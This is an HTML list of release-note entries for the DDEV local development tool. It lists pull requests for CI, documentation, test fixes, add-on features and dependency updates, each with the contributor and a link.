<li>ci: run golangci-lint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365231243" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8375" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8375/hovercard" href="https://github.com/ddev/ddev/pull/8375">#8375</a></li>
<li>docs(mutagen): explain how to reset to the default mode, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355654879" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8367" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8367/hovercard" href="https://github.com/ddev/ddev/issues/8367">#8367</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/silverham/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/silverham">@silverham</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355742321" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8368" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8368/hovercard" href="https://github.com/ddev/ddev/pull/8368">#8368</a></li>
<li>docs(configuration): Add <code>ddev config --database=&lt;database type&gt;:&lt;version&gt;</code> example command (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4382057472" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8387" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8387/hovercard" href="https://github.com/ddev/ddev/pull/8387">#8387</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/silverham/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/silverham">@silverham</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4382057472" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8387" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8387/hovercard" href="https://github.com/ddev/ddev/pull/8387">#8387</a></li>
<li>build: bump fuxingloh/multi-labeler from 4 to 5 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379236601" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8385" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8385/hovercard" href="https://github.com/ddev/ddev/pull/8385">#8385</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379236601" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8385" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8385/hovercard" href="https://github.com/ddev/ddev/pull/8385">#8385</a></li>
<li>docs: clarify --cleanup --name for single snapshot deletion (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4375346339" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8384" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8384/hovercard" href="https://github.com/ddev/ddev/pull/8384">#8384</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CallMeLeon167/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CallMeLeon167">@CallMeLeon167</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4375346339" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8384" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8384/hovercard" href="https://github.com/ddev/ddev/pull/8384">#8384</a></li>
<li>docs(add-ons): add real example for bats testing (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365579223" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8377" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8377/hovercard" href="https://github.com/ddev/ddev/pull/8377">#8377</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365579223" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8377" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8377/hovercard" href="https://github.com/ddev/ddev/pull/8377">#8377</a></li>
<li>fix(commands): normalize $OSTYPE detection for linux, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371984340" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8382" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8382/hovercard" href="https://github.com/ddev/ddev/issues/8382">#8382</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mikee-3000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mikee-3000">@Mikee-3000</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372014245" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8383" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8383/hovercard" href="https://github.com/ddev/ddev/pull/8383">#8383</a></li>
<li>docs: Add Xcode iOS simulator info (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359170507" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8371" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8371/hovercard" href="https://github.com/ddev/ddev/pull/8371">#8371</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jamesmacwhite/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jamesmacwhite">@jamesmacwhite</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359170507" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8371" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8371/hovercard" href="https://github.com/ddev/ddev/pull/8371">#8371</a></li>
<li>feat(utility): add <code>ddev utility addon-update-checker</code> command by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363864217" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8373" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8373/hovercard" href="https://github.com/ddev/ddev/pull/8373">#8373</a></li>
<li>fix(add-ons): autocomplete for path by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365566102" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8376" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8376/hovercard" href="https://github.com/ddev/ddev/pull/8376">#8376</a></li>
<li>test(wsl2): fix TestHostDBPort by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4400300129" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8391" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8391/hovercard" href="https://github.com/ddev/ddev/pull/8391">#8391</a></li>
<li>test(windows): fix TestUtilityAddonUpdateCheckerCmd, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363864217" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8373" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8373/hovercard" href="https://github.com/ddev/ddev/pull/8373">#8373</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4408413794" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8394" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8394/hovercard" href="https://github.com/ddev/ddev/pull/8394">#8394</a></li>
<li>docs(quickstart): Add description to Drupal Git clone example by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gitressa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gitressa">@gitressa</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4408464620" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8395" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8395/hovercard" href="https://github.com/ddev/ddev/pull/8395">#8395</a></li>
<li>fix(ddev-webserver): <code>ddev stop</code> takes 10s due to bash deferring SIGTERM during foreground cat, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4218384497" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8295" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8295/hovercard" href="https://github.com/ddev/ddev/issues/8295">#8295</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4408650681" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8396" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8396/hovercard" href="https://github.com/ddev/ddev/pull/8396">#8396</a></li>
<li>docs: unify homeadditions path resolution and Composer auth.json handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eiriksm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eiriksm">@eiriksm</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4420266904" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8400" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8400/hovercard" href="https://github.com/ddev/ddev/pull/8400">#8400</a></li>
<li>docs(providers): align --environment examples and flags, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4428749367" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8402" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8402/hovercard" href="https://github.com/ddev/ddev/issues/8402">#8402</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4428795862" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8403" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8403/hovercard" href="https://github.com/ddev/ddev/pull/8403">#8403</a></li>
<li>test(share): improve cloudflared debug output on unmarshal errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4415837658" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8398" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8398/hovercard" href="https://github.com/ddev/ddev/pull/8398">#8398</a></li>
<li>ci(github): reorganize test jobs, add custom workflow_dispatch, remove unused workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4423464019" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8401" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8401/hovercard" href="https://github.com/ddev/ddev/pull/8401">#8401</a></li>
<li>feat(add-on): add <code>#ddev-interactive</code> option for actions, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3958400616" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8155" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8155/hovercard" href="https://github.com/ddev/ddev/issues/8155">#8155</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367267290" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8381" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8381/hovercard" href="https://github.com/ddev/ddev/pull/8381">#8381</a></li>
<li>refactor(tui): upgrade bubbletea/bubbles/lipgloss to v2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4430728699" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8404" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8404/hovercard" href="https://github.com/ddev/ddev/pull/8404">#8404</a></li>
<li>ci: add DDEV_EMBARGO_PHP_VERSIONS to skip specific PHP versions in TestPHPConfig [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432602123" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8407" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8407/hovercard" href="https://github.com/ddev/ddev/pull/8407">#8407</a></li>
<li>feat: use docker-compose library, optionally download docker-buildx, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3686218597" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7915" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7915/hovercard" href="https://github.com/ddev/ddev/issues/7915">#7915</a>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4218384497" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8295" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8295/hovercard" href="https://github.com/ddev/ddev/issues/8295">#8295</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4091341649" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8234" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8234/hovercard" href="https://github.com/ddev/ddev/pull/8234">#8234</a></li>
<li>ci(docs): add stable docs branch workflow, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3626446323" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7862" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7862/hovercard" href="https://github.com/ddev/ddev/issues/7862">#7862</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4436512981" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8408" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8408/hovercard" href="https://github.com/ddev/ddev/pull/8408">#8408</a></li>
<li>ci(forks): fetch variables from public-variables branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4439217094" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8410" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8410/hovercard" href="https://github.com/ddev/ddev/pull/8410">#8410</a></li>
<li>ci(wsl2): read public-variables in pwsh, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4439217094" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8410" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8410/hovercard" href="https://github.com/ddev/ddev/pull/8410">#8410</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4439903018" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8411" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8411/hovercard" href="https://github.com/ddev/ddev/pull/8411">#8411</a></li>
<li>ci: improve test embargo system for Go, bats, and CI workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4445844483" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8413" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8413/hovercard" href="https://github.com/ddev/ddev/pull/8413">#8413</a></li>
<li>docs(config): improve wording for database and docker_buildx_version, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4382057472" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8387" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8387/hovercard" href="https://github.com/ddev/ddev/pull/8387">#8387</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4437190033" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8409" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8409/hovercard" href="https://github.com/ddev/ddev/pull/8409">#8409</a></li>
<li>refactor: improve CheckAvailableSpace reliability and output, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4387455452" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8388" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8388/hovercard" href="https://github.com/ddev/ddev/issues/8388">#8388</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wolcen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wolcen">@wolcen</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4441784873" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8412" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8412/hovercard" href="https://github.com/ddev/ddev/pull/8412">#8412</a></li>
<li>ci(buildkite): fix MSYS path conversion breaking public-variables fetch on Windows, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4439217094" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8410" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8410/hovercard" href="https://github.com/ddev/ddev/pull/8410">#8410</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4469883387" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8416" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8416/hovercard" href="https://github.com/ddev/ddev/pull/8416">#8416</a></li>
<li>docs(brand-guide): add light, dark, and auto logo variants to logos table, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4472217677" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8417" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8417/hovercard" href="https://github.com/ddev/ddev/issues/8417">#8417</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4487849922" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8419" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8419/hovercard" href="https://github.com/ddev/ddev/pull/8419">#8419</a></li>
<li>feat(docs): migrate from mkdocs-material to zensical, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3613763641" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7840" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7840/hovercard" href="https://github.com/ddev/ddev/issues/7840">#7840</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4053894144" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8216" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8216/hovercard" href="https://github.com/ddev/ddev/issues/8216">#8216</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497071680" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8421" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8421/hovercard" href="https://github.com/ddev/ddev/pull/8421">#8421</a></li>
<li>docs(add-ons): mention <code>#ddev-generated</code> in quickstart by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chx">@chx</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4494536198" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8420" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8420/hovercard" href="https://github.com/ddev/ddev/pull/8420">#8420</a></li>
<li>ci(docs): enable zensical strict mode, use dynamic Pages base URL, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497071680" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8421" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8421/hovercard" href="https://github.com/ddev/ddev/pull/8421">#8421</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4501866656" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8423" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8423/hovercard" href="https://github.com/ddev/ddev/pull/8423">#8423</a></li>
<li>fix(ddev-dbserver): unlink stale socket before mysqld init by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4502303473" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8424" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8424/hovercard" href="https://github.com/ddev/ddev/pull/8424">#8424</a></li>
<li>test: add details to TestCmdAddonPHP by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504444004" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8425" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8425/hovercard" href="https://github.com/ddev/ddev/pull/8425">#8425</a></li>
<li>chore(sponsors): update percentage and api link [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523958874" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8427" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8427/hovercard" href="https://github.com/ddev/ddev/pull/8427">#8427</a></li>
<li>ci(pr): migrate to ddev/commit-message-checker@v3 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4525819574" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8428" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8428/hovercard" href="https://github.com/ddev/ddev/pull/8428">#8428</a></li>
<li>test(lima): fix broken cleanup in TestCmdAddonPHP, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504444004" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8425" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8425/hovercard" href="https://github.com/ddev/ddev/pull/8425">#8425</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534532321" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8430" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8430/hovercard" href="https://github.com/ddev/ddev/pull/8430">#8430</a></li>
<li>fix: replace remaining world writeable directories, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4135827270" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8251" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8251/hovercard" href="https://github.com/ddev/ddev/issues/8251">#8251</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367047484" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8379" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8379/hovercard" href="https://github.com/ddev/ddev/pull/8379">#8379</a></li>
<li>chore(composer): add <code>COMPOSER_NO_BLOCKING</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4540301022" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8432" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8432/hovercard" href="https://github.com/ddev/ddev/pull/8432">#8432</a></li>
<li>fix(exec): allocate TTY only when stdout is also a terminal, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4091341649" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8234" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8234/hovercard" href="https://github.com/ddev/ddev/pull/8234">#8234</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4540181746" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8431" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8431/hovercard" href="https://github.com/ddev/ddev/pull/8431">#8431</a></li>
